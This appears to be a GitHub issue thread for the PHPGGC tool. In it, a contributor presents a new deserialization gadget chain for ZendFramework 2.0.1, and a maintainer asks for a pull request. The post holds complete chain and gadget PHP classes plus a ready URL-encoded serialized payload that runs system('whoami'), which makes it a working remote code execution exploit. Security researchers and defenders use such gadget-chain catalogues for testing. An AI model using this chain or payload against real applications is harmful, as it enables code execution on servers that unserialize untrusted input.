New pop chains for ZendFramework 2.0.1

[CyanM0un]

Recently I have been learning the zendframework/rce3 chain and fonud a new chain, hoping to help implement the phpggc.

the calling stack is: zend\cache\storage\adapter\memory::destruct zend\view\renderer\phprenderer::call zend\ServiceManager\AbstractPluginManager::get zend\ServiceManager\ServiceManager::get zend\ServiceManager\ServiceManager::create zend\Filter\AbstractFilter::__invoke zend\Filter\FilterChain::filter

chain.php:

<?php

namespace GadgetChain\ZendFramework;

class RCE3 extends \PHPGGC\GadgetChain\RCE\FunctionCall
{
    public static $version = '2.0.1 <= ?';
    public static $vector = '__destruct';
    public static $author = 'CyanM0un';

    public function generate(array $parameters)
    {
        $function = $parameters["function"];
        $parameter = $parameters["parameter"];

        return new \Zend\Cache\Storage\Adapter\Memory($function, $parameter);
    }
}

gadgets.php

<?php
namespace Zend\Cache\Storage\Adapter{
    class Memory{
        protected $eventHandles;
        protected $events;

        function __construct($function, $param)
        {
            $this->eventHandles = [1];
            $this->events = new \Zend\View\Renderer\PhpRenderer($function, $param);
        }
    }
}

namespace Zend\View\Renderer{
    class PhpRenderer{
        private $__helpers;

        function __construct($function, $param)
        {
            $this->__helpers = new \Zend\Tag\Cloud\DecoratorPluginManager($function, $param);
        }
    }
}

namespace Zend\Tag\Cloud{
    class DecoratorPluginManager{
        protected $canonicalNames;
        protected $invokableClasses;
        protected $retrieveFromPeeringManagerFirst;
        protected $initializers;

        function __construct($function, $param)
        {
            $this->canonicalNames = array("detach"=>"cname","cname"=>"any");
            $this->invokableClasses = array("cname"=>"Zend\Tag\Cloud\DecoratorPluginManager");//satisfying the class_exists
            $this->retrieveFromPeeringManagerFirst = false;
            $this->initializers = [new \Zend\Filter\FilterChain($function, $param)];
        }
    }
}

namespace Zend\Filter {
    class FilterChain {
        protected $filters;

        function __construct($function, $param) {
            $this->filters = new \SplFixedArray(2);
            $this->filters[0] = array(
                new \Zend\Json\Expr($param),
                "__toString"
            );
            $this->filters[1] = $function;
        }
    }
}

namespace Zend\Json {
    class Expr {
        protected $expression;

        function __construct($param) {
            $this->expression = $param;
        }
    }
}

can test using the payload:

O%3A33%3A%22Zend%5CCache%5CStorage%5CAdapter%5CMemory%22%3A2%3A%7Bs%3A15%3A%22%00%2A%00eventHandles%22%3Ba%3A1%3A%7Bi%3A0%3Bi%3A1%3B%7Ds%3A9%3A%22%00%2A%00events%22%3BO%3A30%3A%22Zend%5CView%5CRenderer%5CPhpRenderer%22%3A1%3A%7Bs%3A41%3A%22%00Zend%5CView%5CRenderer%5CPhpRenderer%00__helpers%22%3BO%3A37%3A%22Zend%5CTag%5CCloud%5CDecoratorPluginManager%22%3A4%3A%7Bs%3A17%3A%22%00%2A%00canonicalNames%22%3Ba%3A2%3A%7Bs%3A6%3A%22detach%22%3Bs%3A5%3A%22cname%22%3Bs%3A5%3A%22cname%22%3Bs%3A3%3A%22any%22%3B%7Ds%3A19%3A%22%00%2A%00invokableClasses%22%3Ba%3A1%3A%7Bs%3A5%3A%22cname%22%3Bs%3A37%3A%22Zend%5CTag%5CCloud%5CDecoratorPluginManager%22%3B%7Ds%3A34%3A%22%00%2A%00retrieveFromPeeringManagerFirst%22%3Bb%3A0%3Bs%3A15%3A%22%00%2A%00initializers%22%3Ba%3A1%3A%7Bi%3A0%3BO%3A23%3A%22Zend%5CFilter%5CFilterChain%22%3A1%3A%7Bs%3A10%3A%22%00%2A%00filters%22%3BO%3A13%3A%22SplFixedArray%22%3A2%3A%7Bi%3A0%3Ba%3A2%3A%7Bi%3A0%3BO%3A14%3A%22Zend%5CJson%5CExpr%22%3A1%3A%7Bs%3A13%3A%22%00%2A%00expression%22%3Bs%3A6%3A%22whoami%22%3B%7Di%3A1%3Bs%3A10%3A%22__toString%22%3B%7Di%3A1%3Bs%3A6%3A%22system%22%3B%7D%7D%7D%7D%7D%7D

[cfreal]

Hello again,

Same: can you please open a PR ?

Charles